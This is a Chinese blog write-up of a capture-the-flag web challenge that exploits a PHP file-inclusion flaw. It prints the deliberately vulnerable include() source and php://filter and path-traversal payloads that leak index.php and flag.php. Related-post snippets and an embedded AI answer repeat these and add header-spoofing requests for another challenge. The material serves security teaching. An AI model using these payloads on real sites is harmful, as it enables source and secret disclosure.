buuctf-[BSidesCF 2020]Had a bad day(小宇特详解)

最新推荐文章于 2024-06-29 10:44:52 发布
最新推荐文章于 2024-06-29 10:44:52 发布
阅读量5.7k 收藏 10
点赞数 7
分类专栏: buuctf 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/122959626
版权
本文详细解析了一个涉及PHP的BSidesCF2020 Hadabadday挑战,主要讨论了SQL注入和文件包含漏洞。通过php://filter伪协议,作者展示了如何读取并解码index.php,以及如何利用文件包含漏洞读取flag.php内容,最终成功获取到flag。文章重点在于利用技巧和PHP安全防护的知识。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

buuctf-[BSidesCF 2020]Had a bad day(小宇特详解)

先看一下题目

这里上面有注入点,这里怀疑是SQL注入

先尝试读取一下index.php

这里使用php伪协议

payload:

php://filter:/convert.base64-encode/resource=index.php


存在文件包含漏洞,但是这里报错了,分析之后是无法打开流:操作失败

这里去除php后缀

payload

php://filter/convert.base64-encode/resource=index

解码之后找到index.php

<?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>

传入的category参数必须有woofers,meowers,index才行

这里构造payload来包含flag.php

/index.php?category=woofers/../flag

那如何去获取flag.php的内容呢

这里使用的知识点是php://filter伪协议套协议

payload:

/index.php?category=php://filter/convert.base64-encode/index/resource=flag

base64解码

buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 783
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
[BSidesCF 2020]Had a bad day 1(伪协议嵌套)
weixin_45577185的博客
09-06 353
先用php://filter/read=convert.base64-encode/resource=index.php读取index.php的页面代码看看,发现读取不成功,后来才发现.php是后来加上去的 php://filter/read=convert.base64-encode/resource=index 然后用base64解密 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers".
BUUCTF 个人做题记录【6-24】
qq_61620566的博客
06-24 1104
学习笔记,大佬勿喷
BUUCTF:[BSidesCF 2020]Had a bad day
末初 - mochu7
03-30 6013
BUUCTF:[BSidesCF 2020]Had a bad day 可能存在SQL注入或者文件包含,在我尝试读取index.php源码的时候出现了报错信息 的确是文件包含,但是有index.php却读取错误,报错显示无法打开流:操作失败在后面测试的时候,发现除掉后缀即可读取到源码 base64解码读取源码 <?php $file = $_GET['category']; ...
BUUCTF_[BSidesCF 2020]Had a bad day
m_de_g的博客
04-26 748
【代码】BUUCTF_[BSidesCF 2020]Had a bad day
BUUCTF [BSidesCF 2020] Had a bad day
Senimo
12-11 643
BUUCTF [BSidesCF 2020] Had a bad day 考点: php伪协议嵌套 启动环境: 其中包含两个按钮,选择猫和狗的图片: 此时的URL变为: http://xxx/index.php?category=meowers 其中包含有GET传参,尝试修改category传入的值,得到报错: 其中为include()函数报错,尝试获取index.php页面的源码:php://filter/read=convert.base64-encode/resource=index.php
BUUCTF】[BSidesCF 2020]Had a bad day
aoao331198的博客
04-24 816
注意到url中的参数category,以为是注入点,实际上输入其他的只会一个错误说明 用php伪协议读取文件 /index.php?category=php://filter/convert.base64-encode/resource=index 解密拿到代码 <?php $file = $_GET['category']; if(isset($file)) { if( strpos( $file, "woofers" ) !== false || st.
web:[BSidesCF 2020]Had a bad day(伪协议、协议嵌套利用、strpos()函数)
sleepywin的博客
01-02 996
通过源码可知,必须要含有woofers、meowers、index其中一个,直接查找flag是找不到的,这里需要包含其中一个。如果存在,则继续执行下一步;如果不存在,则不执行任何操作。这里用到伪协议,用php://filter读取php文件源码内容。可能是被拼接了,删除后面的php就行。进入页面显示如下,有两个选项。从URL的查询参数中获取名为。这里利用strpos()函数。这里可以注意到url的变化。没有正常显示,查看报错信息。如果满足前面的条件,则使用。所指定的PHP文件。
【buu-BSideCF-2020-Had a bad day1】
lalalalafan的博客
11-15 2857
1.打开看源码,啥也没得,参数后面加'就报错了,是一道文件包含 2.读源码 ?category=php://filter/read=convert.base64-encode/resource=index.php 报错了,后端自己加上了.php,所以我们删了 ?category=php://filter/read=convert.base64-encode/resource=index 就可以得到base64编码后的源码了 解码得到源码 <?php $file = $
buuctf web had a bad day
qq_41696858的博客
12-16 1711
这题应该是入门送分题 打开场景,两个超链接,点进去,有猫有狗,带了一个category参数,后面是超链接名字 盲猜是任意文件读取,审计源码 发现了hint <div class="page-include"> 那就说明我们的思路没问题,干就完了 尝试http://10b59fde-8bbb-479a-9ec5-103defcf5b60.node4.buuoj.cn:81/index.php?category=php://filter/convert.base64-encode/resourc
[BSidesCF 2020]Had a bad day
Sk1y的博客
04-05 539
考查点:文件包含,php://filter伪协议的使用
第四十八题——[BSidesCF 2020]Had a bad day
分享简单的安全技术
04-27 444
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,两个按钮,点击任意一个均出现一张照片,且URL参数提交相应的值 第二步:利用php:filter读取index.php发现出错 php://filter/convert.base64-encode/resource=index.php 第三步:去掉.php后缀名后成功获取到源码的base64值,解码后得到源码 <?php $file = $_GET['category']; if(isset(
BUUCTF之[BSidesCF 2020]Had a bad day --- 文件包含漏洞
weixin_44632787的博客
06-22 1202
BUUCTF之[BSidesCF 2020]Had a bad day 题目 点击下面的那两个按钮的时候,发现图片会变化。而且链接上的值也是跟着变化。(看上去像是文件包含的题目) 点击链接的时候只是category=后面的值改变,使用盲猜是文件包含漏洞。所以试试?category=flag.php 好吧,可能是攻击的方式不对。换换其它的: ?category=flag.php # 失败 ?category=flag # 失败 ?category=php://filter/read=co
buuctf题目had a bad day
m0_65853019的博客
06-29 599
页面显示两个按钮,一个WOOFERS,一个MEOWERS,任选一个出来相应图片,对应的url为/index.php?category=woofers(或index.php?出来的字符串发现很像base64编码后的字符串,于是解码得flag。
web buuctf [ Had a bad day]
weixin_44214568的博客
03-28 734
考点:伪协议嵌套(伪协议的过滤器嵌套) 1. 打开页面,url上有get传参,category= 2.尝试注入,1' ,1' or '1=1' 都不行,没有数据库报错 3.尝试文件包含,利用php伪协议,尝试读取index.php,令category=php://filter/read=convert.base64-encode/resource=index.php 根据提示,可以看出确实是文件包含,利用了include函数,include函数在没有找到文件时会爆出警告,有可能是文件名..
BSidesCF 2020]Had a bad day
最新发布
03-11
<think>好的,我现在需要处理用户关于BSidesCF 2020 CTF比赛不佳体验的反馈请求。用户还提到了几个相关的题目,比如Had a bad day和Hurdles,这些题目需要定的请求头、Cookie、参数构造等才能解决。首先,我需要分析用户的问题,确定他们的具体需求。 用户可能遇到了技术上的困难,比如题目中的各种限制条件,如IP地址、Cookie设置、请求头调整、参数编码等,导致无法顺利解题。他们可能对如何正确构造请求或绕过检查感到困惑。同时,用户提到参考了引用资料中的方法,但可能仍有疑问或需要进一步的解释。 接下来,我需要根据提供的引用信息,整理每个题目的关键解决步骤。例如,在Had a bad day中,利用PHP伪协议读取文件;在Hurdles中,设置多个请求头、Cookie以及处理俄语提示。需要将这些步骤清晰地呈现出来,帮助用户理解每一步的作用。 此外,用户可能希望了解如何系统地解决类似的CTF题目,包括如何分析题目要求、构造有效Payload、调试请求等。因此,回答中需要包含解题思路的通用方法,并结合具体例子进行说明,确保用户能够举一反三。 同时,要注意引用标记的正确使用,每个关键点后添加对应的引用来源。例如,在提到PHP伪协议时引用[5],在讨论请求头设置时引用[3]和[4]。这样不仅增加回答的可信度,也方便用户查阅原始资料。 最后,生成的相关问题需要覆盖用户可能感兴趣的其他方面,比如其他CTF题目的解法、工具推荐或学习资源,确保信息全面且实用。整个过程要保持回答结构清晰,语言简洁,符合中文表达习惯,避免使用复杂术语,必要时进行解释。</think>### BSidesCF 2020 CTF题目反馈与解题思路 #### 1. 题目难点与反馈 BSidesCF 2020的部分题目(如`Had a bad day`和`Hurdles`)因其复杂的条件限制和多层验证机制,可能导致解题体验不佳。以下是关键问题总结及解决方法: --- #### 2. 具体题目分析与解法 **题目1: [BSidesCF 2020] Had a bad day** - **目标**: 绕过文件包含限制,读取`flag.php`。 - **关键步骤**: 1. 发现URL参数`category`存在文件包含漏洞,但限制了文件路径必须包含`woofers`或`meowers`。 2. 利用PHP伪协议构造Payload,通过Base64编码读取文件内容: `php://filter/read=convert.base64-encode/woofers/resource=flag`[^5]。 3. 解码Base64内容即可获取Flag。 --- **题目2: [BSidesCF 2020] Hurdles** - **目标**: 通过多层HTTP请求验证。 - **关键条件与解法**: 1. **IP限制**: 客户端IP需为`13.37.13.37`,通过`X-Forwarded-For`头伪造[^4]。 2. **Cookie要求**: 设置`Fortune=6265`(RFC 6265为2011年HTTP状态管理标准)[^3]。 3. **语言与格式**: 添加`Accept:text/plain`和`Accept-Language:ru`绕过俄语提示[^3]。 4. **来源验证**: 添加`Origin`和`Referer`头指向指定域名。 5. **最终请求示例**: ```bash curl -X PUT 'http://...' -H 'X-Forwarded-For:13.37.13.37' -b 'Fortune=6265' -H 'Accept:text/plain' -H 'Origin:https://ctf.bsidessf.net' ``` --- #### 3. 通用解题建议 - **分析题目条件**: 仔细阅读返回的提示信息(如HTTP头、错误消息),定位验证逻辑。 - **分步验证**: 使用工具(如Burp Suite或Postman)逐步添加请求头/Cookie,观察响应变化。 - **编码与绕过**: 对殊字符进行URL编码(如`%00`表示空字符),利用协议封装(如`php://filter`)绕过过滤[^5]。 ---
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值